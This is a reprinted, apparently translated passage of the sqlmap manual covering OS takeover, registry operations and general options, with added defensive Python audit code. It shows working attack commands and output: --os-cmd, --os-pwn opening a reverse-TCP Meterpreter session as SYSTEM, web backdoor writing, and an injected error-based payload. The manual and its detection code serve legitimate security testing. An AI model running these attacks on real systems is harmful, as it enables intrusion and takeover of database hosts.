15. Operating system control
1. Execute arbitrary operating system commands
Parameters: --os-cmd and --os-shell
If the DBMS is MySQL, PostgreSQL, or Microsoft SQL Server and the current database user has the required privileges, sqlmap can use the SQL injection to execute arbitrary operating system commands.
When the DBMS is MySQL or PostgreSQL, sqlmap uses the file upload feature described earlier to upload a binary shared library containing the user-defined functions sys_exec() and sys_eval(), creates the two UDFs in the database, and then runs the user-specified command through one of them. Which function it uses depends on whether the user wants to see the standard output of the command.
When the DBMS is Microsoft SQL Server, sqlmap executes arbitrary commands through the stored procedure xp_cmdshell. If xp_cmdshell is disabled (the default for SQL Server 2005 and later), sqlmap enables it; if it does not exist, sqlmap creates it.
When the user wants to see the command's standard output, sqlmap retrieves it with one of the enumeration injection techniques (blind, in-band or error-based); when the output is not wanted, the command is run through stacked-query injection.
The following example targets PostgreSQL:
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1
Some of the output is as follows:
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF ‘sys_eval‘ already exist
[hh:mm:12] [INFO] checking if UDF ‘sys_exec‘ already exist
[hh:mm:12] [INFO] creating UDF ‘sys_eval‘ from the binary UDF file
[hh:mm:12] [INFO] creating UDF ‘sys_exec‘ from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
‘uid=104(postgres) gid=106(postgres) groups=106(postgres)‘
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF ‘sys_eval‘? [Y/n] y
do you want to remove UDF ‘sys_exec‘? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
The parameter --os-shell provides an interactive shell that runs arbitrary commands; like --sql-shell, it supports TAB completion and command history.
When stacked queries are not supported (for example PHP or ASP with MySQL) and the DBMS is MySQL, it is still possible to write a web backdoor with a SELECT ... INTO OUTFILE clause into a writable directory of the web server host and then execute commands through that backdoor. sqlmap supports this technique and asks the user for a comma-separated list of paths that may be writable directories. sqlmap supports the following server-side scripting languages:
2. Out-of-band TCP connection: Meterpreter and related
Parameters: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path
If the DBMS is MySQL, PostgreSQL, or Microsoft SQL Server and the current database user has the required privileges, sqlmap can establish an out-of-band TCP connection between the attacker's host and the host where the database runs. Depending on the user's choice, this connection can be an interactive command shell, a Meterpreter session, or a graphical user interface (VNC) session.
sqlmap relies on Metasploit to build the shellcode and has four techniques for running it on the database host:
- The database executes the Metasploit shellcode in memory through the user-defined function sys_bineval() that sqlmap creates. Supported on MySQL and PostgreSQL. Parameter: --os-pwn.
- sqlmap uploads a Metasploit stand-alone payload stager and executes it through its own user-defined functions (sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server). Parameter: --os-pwn.
- Exploitation of the remote code execution vulnerability MS08-068: the attacker's machine uses the Metasploit smb_relay module to listen for connections from the target. Requires running sqlmap as root on Linux/Unix, and the target DBMS must run on Windows with administrator privileges. Parameter: --os-smbrelay.
- A heap-based buffer overflow (MS09-004) in the stored procedure sp_replwritetovarbin of Microsoft SQL Server 2000 and 2005, which executes Metasploit shellcode in memory. sqlmap has its own Data Execution Prevention bypass technique for exploiting it, but it needs Metasploit to generate the shellcode that runs once the vulnerability is triggered. Parameter: --os-bof.
The following example targets MySQL:
python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF ‘sys_bineval‘ already exist
[hh:mm:33] [INFO] checking if UDF ‘sys_exec‘ already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF ‘sys_bineval‘ from the binary UDF file
[hh:mm:34] [INFO] creating UDF ‘sys_exec‘ from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF ‘sys_bineval‘ (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF ‘sys_bineval‘, please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The ‘priv‘ extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
On Windows, MySQL runs as SYSTEM by default, but PostgreSQL runs as the low-privileged user postgres on both Windows and Linux. SQL Server 2000 runs as SYSTEM by default, whereas SQL Server 2005 to 2008 usually runs as NETWORK SERVICE and, in a few cases, as LOCAL SERVICE.
Use the parameter --priv-esc to run Metasploit's getsystem command and try to escalate privileges.
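The UDFs described in subsections 1 and 2 (sys_exec, sys_eval, sys_bineval) and an enabled xp_cmdshell are what a defender should look for after an incident, since the cleanup warning in the first example notes that the shared object files stay on disk even after the UDFs are dropped. The following Python audit is an added example, not sqlmap's own code: it checks rows pulled from mysql.func, from pg_proc joined with pg_language, and from sys.configurations. All sample rows are constructed here and the library paths are placeholders, not sqlmap's real file names.

```python
"""Added example: audit a database for the OS-execution primitives that
sqlmap's takeover options create (sys_exec/sys_eval/sys_bineval UDFs on
MySQL and PostgreSQL, xp_cmdshell on SQL Server).  All sample rows below
are constructed for the example; the library paths are placeholders."""
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# UDF names the page lists: sys_exec/sys_eval (--os-cmd, --os-shell) and
# sys_bineval (--os-pwn).  Any other "sys_*" UDF is reported for review.
SQLMAP_UDF_NAMES = frozenset({"sys_exec", "sys_eval", "sys_bineval"})


@dataclass(frozen=True)
class Finding:
    dbms: str
    name: str
    detail: str


def audit_mysql_func(rows: Iterable[Tuple[str, str]]) -> List[Finding]:
    """rows are (name, dl) pairs, i.e. SELECT name, dl FROM mysql.func;
    'dl' is the shared object the UDF was loaded from."""
    findings = []
    for name, dl in rows:
        lowered = name.lower()
        if lowered in SQLMAP_UDF_NAMES:
            findings.append(Finding("mysql", name, f"sqlmap UDF loaded from {dl}"))
        elif lowered.startswith("sys_"):
            findings.append(Finding("mysql", name,
                                    f"sys_* UDF loaded from {dl}; confirm it is expected"))
    return findings


def audit_pg_proc(rows: Iterable[Tuple[str, str, Optional[str]]]) -> List[Finding]:
    """rows are (proname, lanname, probin) from pg_proc joined with
    pg_language; a C-language function with a probin path is a native UDF."""
    findings = []
    for proname, lanname, probin in rows:
        if lanname == "c" and proname.lower() in SQLMAP_UDF_NAMES:
            findings.append(Finding("postgresql", proname, f"C UDF backed by {probin}"))
    return findings


def audit_mssql_config(rows: Iterable[Tuple[str, int]]) -> List[Finding]:
    """rows are (name, value_in_use) from sys.configurations."""
    findings = []
    for name, value_in_use in rows:
        if name.lower() == "xp_cmdshell" and int(value_in_use) == 1:
            findings.append(Finding("mssql", name,
                                    "xp_cmdshell is enabled (off by default since SQL Server 2005)"))
    return findings


def audit_all(mysql_rows, pg_rows, mssql_rows) -> List[Finding]:
    """Run the three audits and concatenate their findings."""
    return (audit_mysql_func(mysql_rows) + audit_pg_proc(pg_rows)
            + audit_mssql_config(mssql_rows))


# Constructed sample rows (library paths are placeholders, not sqlmap's real names).
SAMPLE_MYSQL_FUNC = [
    ("sys_exec", "udf_placeholder.so"),
    ("sys_eval", "udf_placeholder.so"),
    ("json_helper", "libjson_helper.so"),
]
SAMPLE_PG_PROC = [
    ("sys_bineval", "c", "/tmp/udf_placeholder.so"),
    ("lower", "internal", None),
    ("plpgsql_call_handler", "c", "$libdir/plpgsql"),
]
SAMPLE_MSSQL_CONFIG = [("xp_cmdshell", 1), ("clr enabled", 0)]

if __name__ == "__main__":
    for f in audit_all(SAMPLE_MYSQL_FUNC, SAMPLE_PG_PROC, SAMPLE_MSSQL_CONFIG):
        print(f"[{f.dbms}] {f.name}: {f.detail}")
```

In a real deployment the rows come from the three catalog queries named in the docstrings; the audit deliberately reports any other sys_* UDF too, because the names are configurable and a renamed UDF loaded from an unexpected shared object deserves the same review.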
16. Windows registry operations
The Windows registry can be manipulated if all of the following conditions hold:
- The target DBMS runs on Windows
- The target DBMS is MySQL, PostgreSQL, or Microsoft SQL Server
- Stacked queries are supported
- The current user has sufficient privileges in the target DBMS
1. Read a Windows registry key value
Parameter: --reg-read
2. Write a Windows registry key value
Parameter: --reg-add
3. Delete a Windows registry key value
Parameter: --reg-del
4. Auxiliary parameters
Parameters: --reg-key, --reg-value, --reg-data and --reg-type
Used together, these parameters let you add or modify a Windows registry key value in a single command without answering sqlmap's prompts interactively while it runs.
- --reg-key: the path of the Windows registry key
- --reg-value: the name of the value within that key
- --reg-data: the data to store in that value
- --reg-type: the data type of the value
Here is an example:
python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
17. General options
1. Load a sqlmap session from an SQLite file
Parameter: -s
sqlmap automatically creates a persistent session SQLite file for each target, stored under a fixed directory (for example ~/.sqlmap/output/), which holds all the data needed to resume the session. Use this parameter to specify the SQLite file explicitly (for example, to store the data of several targets in the same SQLite file).
2. Log HTTP(S) traffic to a file
Parameter: -t
This parameter takes a file path; all HTTP(S) requests and responses are logged to that file in text form. Such a log is useful for debugging.
3. Non-interactive mode
Parameter: --batch
With this parameter sqlmap runs non-interactively and every prompt takes its default answer.
4. Set the character encoding
Parameter: --charset
To decode data correctly, sqlmap uses the information supplied by the web server (such as the charset in the HTTP headers) or guesses the character encoding heuristically with the third-party library chardet.
Use the parameter --charset to specify the encoding explicitly, for example --charset=GBK.
5. Crawl the target site starting from the target URL
Parameter: --crawl
sqlmap can crawl the target site starting from the target URL and collect URLs that may be injectable. The parameter takes a crawl depth, measured relative to the URL where the crawl starts. The crawl ends only after all newly found links have been visited recursively. It is recommended to combine this parameter with --delay.
The following example targets MySQL:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
Some of the output is as follows:
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset ‘ascii‘
[xx:xx:00] [INFO] 42/56 links visited (75%)
Parameter: --crawl-exclude
This parameter takes a regular expression; URLs that match it are not crawled. For example, --crawl-exclude=logout excludes every URL containing the string "logout".
6. Set the delimiter of the output CSV file
Parameter: --csv-del
When data is written to a CSV file (--dump-format=csv), fields are separated by "," by default; use this parameter to choose another delimiter, for example --csv-del=";".
7. DBMS authentication credentials
Parameter: --dbms-cred
When an operation fails because the current database user's privileges are too low, this parameter lets you supply the credentials of an administrative user. sqlmap then re-runs the failed operation as that user through a "run as" mechanism specific to the DBMS (for example OPENROWSET on Microsoft SQL Server). Naturally, you need to know the administrative user's credentials.
8. Data output format
Parameter: --dump-format
sqlmap can write enumerated data in three formats: CSV, HTML and SQLite. CSV is the default: each table is saved to a text file with one record per line and fields separated by commas (or by the delimiter given with --csv-del). With HTML, all data is written to one HTML file, each table as an HTML table. With SQLite, all data is saved to an SQLite file whose table names and structures match the original tables.
9. Estimated time of completion
Parameter: --eta
This parameter displays the estimated time to completion. The following example is a boolean-based blind injection targeting Oracle:
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
Some of the output is as follows:
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64
Then:
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:
‘Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod‘
As the output shows, sqlmap first retrieves the length of the query output, then estimates the completion time, displays a percentage progress bar and counts the data retrieved so far.
10. Flush the session file
Parameter: --flush-session
Use this parameter to flush the session file and avoid problems that sqlmap's default caching can cause. Use it only if you understand what the session file is; the alternative is to delete the session file manually.
11. Parse and test form input fields
Parameter: --forms
Besides testing form data for injection points with -r and --data, you can also use the parameter --forms.
When --forms is used together with -u, sqlmap parses the forms on the page returned by the target URL (the one given with -u) and tests whether the form fields are injectable, rather than testing the target URL itself.
12. Ignore query results stored in the session file
Parameter: --fresh-queries
Use this parameter to ignore the query results stored in the session file and re-run the queries.
13. Use the hex function on returned results
Parameter: --hex
Non-ASCII data is easily corrupted in transit; this parameter makes the target DBMS return data hex-encoded with its hex function.
The following example targets PostgreSQL:
python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
Some of the output is as follows:
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: ‘pg_query() [<a href=‘function.pg-query‘>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>‘
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
14. Specify the output directory
Parameter: --output-dir
By default sqlmap saves session and result files to the subdirectory "output"; use this parameter to choose another directory, for example --output-dir=/tmp.
15. Parse DBMS error messages from the response
Parameter: --parse-errors
If the web application is configured in debug mode, SQL error messages are likely to appear in the HTTP response page. These messages help explain why an operation failed; for example, a failure caused by insufficient privileges produces a message like "Access denied for user".
The following example targets Microsoft SQL Server:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
Some of the output is as follows:
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
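Subsections 13 and 15 together show why verbose error pages matter to a defender: the error text returns whatever the injected query put into the message, including a hex-encoded banner. The Python below is an added example, not sqlmap's or the page's own code: it classifies response bodies by the DBMS error signatures seen in the output above, extracts marker-bracketed hex blobs (the :vtj: ... :nxb: form is modelled on the page's output; real markers vary per run) and decodes them, reporting rather than silently dropping a blob that cannot be decoded. The sample bodies are constructed.

```python
"""Added example: flag verbose DBMS error messages in HTTP response bodies and
decode hex-encoded data that leaks through them.  The error signatures come
from the page's output; sample bodies are constructed for this example."""
import re
from typing import Dict, List, Optional

# Error text signatures taken from the page's own output; extend as needed.
DBMS_ERROR_SIGNATURES = {
    "mssql": re.compile(r"Microsoft OLE DB Provider for ODBC Drivers \(0x[0-9A-Fa-f]{8}\)"
                        r"|\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\]"),
    "postgresql": re.compile(r"pg_query\(\).*?Query failed: ERROR:", re.DOTALL),
    "mysql": re.compile(r"Access denied for user"),
}

# Hex output bracketed by three-letter markers such as :vtj: ... :nxb:
# (modelled on the page's output; the markers differ from run to run).
HEX_LEAK = re.compile(r":([a-z]{3}):([0-9A-Fa-f]+):([a-z]{3}):")


def classify_error(body: str) -> Optional[str]:
    """Return the DBMS whose verbose error text appears in the body, if any."""
    for dbms, pattern in DBMS_ERROR_SIGNATURES.items():
        if pattern.search(body):
            return dbms
    return None


def extract_hex_leaks(body: str) -> List[str]:
    """Decode every marker-bracketed hex blob.  A blob that cannot be decoded
    (for example an odd number of hex digits, as in a truncated page) is
    reported instead of dropped."""
    leaks = []
    for _, hexblob, _ in HEX_LEAK.findall(body):
        try:
            leaks.append(bytes.fromhex(hexblob).decode("utf-8", errors="replace"))
        except ValueError:
            leaks.append(f"<undecodable hex, {len(hexblob)} digits>")
    return leaks


def scan_response(body: str) -> Dict[str, object]:
    """Summarise one response body: which DBMS error leaked, and what data."""
    return {"dbms": classify_error(body), "leaks": extract_hex_leaks(body)}


# Constructed sample responses (the hex blob is built from BANNER at runtime).
BANNER = "PostgreSQL 8.3.9 on i486-pc-linux-gnu"
SAMPLE_PG = ("pg_query() [function.pg-query]: Query failed: ERROR: invalid input "
             "syntax for type numeric: \":vtj:" + BANNER.encode().hex() + ":nxb:\" "
             "in /var/www/app/db.inc.php on line 35")
SAMPLE_MSSQL = ("Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) "
                "[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position "
                "number 10 is out of range of the number of items in the select list.")
SAMPLE_ODD = "Query failed: ERROR: ... \":abc:4142:def:\" and \":ghi:414:jkl:\""
SAMPLE_CLEAN = "<html><body>Item 1: widget</body></html>"

if __name__ == "__main__":
    samples = [("pg", SAMPLE_PG), ("mssql", SAMPLE_MSSQL),
               ("odd", SAMPLE_ODD), ("clean", SAMPLE_CLEAN)]
    for label, body in samples:
        print(label, scan_response(body))
```

Run over a proxy or WAF log of response bodies, scan_response gives a quick inventory of which endpoints return raw DBMS errors; the fix on the application side is to disable debug output and return a generic error page, which removes both the fingerprint and the data channel.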
16. Specify the pivot column
Parameter: --pivot-column
Sometimes (for example on Microsoft SQL Server, Sybase and SAP MaxDB) table records cannot be enumerated directly with OFFSET m,n because the DBMS lacks an equivalent mechanism. In that case sqlmap enumerates the data by picking the most suitable pivot column (the one with the most unique values) and then uses the pivot column's values to retrieve the other columns.
If the automatic selection fails, specify the pivot column manually with this parameter, for example --pivot-column=id.
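The pivot-column enumeration just described, as an added example (not sqlmap's own code) simulated on a constructed in-memory table: choose_pivot_column picks the column with the most distinct values, enumerate_by_pivot walks the table one row per query in the way a DBMS without LIMIT/OFFSET must be walked, and coverage exposes the failure mode the selection rule guards against, namely that rows sharing a non-unique pivot value are skipped.

```python
"""Added example: pivot-column enumeration simulated on an in-memory table.
The table below is constructed for the example."""
from typing import Dict, List, Optional, Tuple

Row = Dict[str, object]


def choose_pivot_column(rows: List[Row]) -> str:
    """Pick the column with the most distinct values (the 'most unique' one);
    ties go to the first column in declaration order."""
    if not rows:
        raise ValueError("cannot choose a pivot for an empty table")
    columns = list(rows[0].keys())
    return max(columns, key=lambda c: len({r[c] for r in rows}))


def fetch_next(rows: List[Row], pivot: str, last) -> Optional[Row]:
    """Simulate SELECT TOP 1 ... WHERE pivot > last ORDER BY pivot, the
    one-row-per-query pattern used when OFFSET m,n is not available."""
    candidates = [r for r in rows if last is None or r[pivot] > last]
    return min(candidates, key=lambda r: r[pivot]) if candidates else None


def enumerate_by_pivot(rows: List[Row],
                       pivot: Optional[str] = None) -> Tuple[str, List[Row]]:
    """Walk the table using the pivot column's values as the cursor."""
    pivot = pivot or choose_pivot_column(rows)
    fetched, last = [], None
    while True:
        row = fetch_next(rows, pivot, last)
        if row is None:
            break
        fetched.append(row)
        last = row[pivot]
    return pivot, fetched


def coverage(rows: List[Row], pivot: Optional[str] = None) -> float:
    """Fraction of rows reached.  Below 1.0 means the pivot was not unique and
    rows sharing a pivot value were skipped, which is why the column with the
    most distinct values is chosen automatically."""
    _, fetched = enumerate_by_pivot(rows, pivot)
    return len(fetched) / len(rows)


# Constructed sample table: 'id' is unique, 'dept' and 'name' are not.
SAMPLE_TABLE = [
    {"id": 3, "dept": "ops", "name": "carol"},
    {"id": 1, "dept": "dev", "name": "alice"},
    {"id": 2, "dept": "dev", "name": "bob"},
    {"id": 4, "dept": "ops", "name": "alice"},
]

if __name__ == "__main__":
    pivot, rows = enumerate_by_pivot(SAMPLE_TABLE)
    print("pivot:", pivot, "rows fetched:", len(rows))
    for column in ("id", "dept", "name"):
        print(column, "coverage:", coverage(SAMPLE_TABLE, column))
```

The same walk is what shows up in database logs as a run of near-identical single-row queries whose WHERE bound advances on every request; that pattern, far more than any single query, is the signature of a pivot-based dump.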
17. Save options to a configuration file
Parameter: --save
Use this parameter to save sqlmap's command-line options to a configuration file, which can be edited and loaded later with -c. The file is in INI format.
18. Update sqlmap
Parameter: --update
This parameter updates sqlmap and obviously requires an Internet connection. If it fails, run "git pull" in the sqlmap installation directory instead. Windows has no git command by default; a Git client such as SmartGit can be used.
In fact, --update and "git pull" update sqlmap the same way, by fetching the latest source code from the Git repository.
It is highly recommended to update sqlmap before reporting bugs.
Security testing === sqlmap (III) (reprint)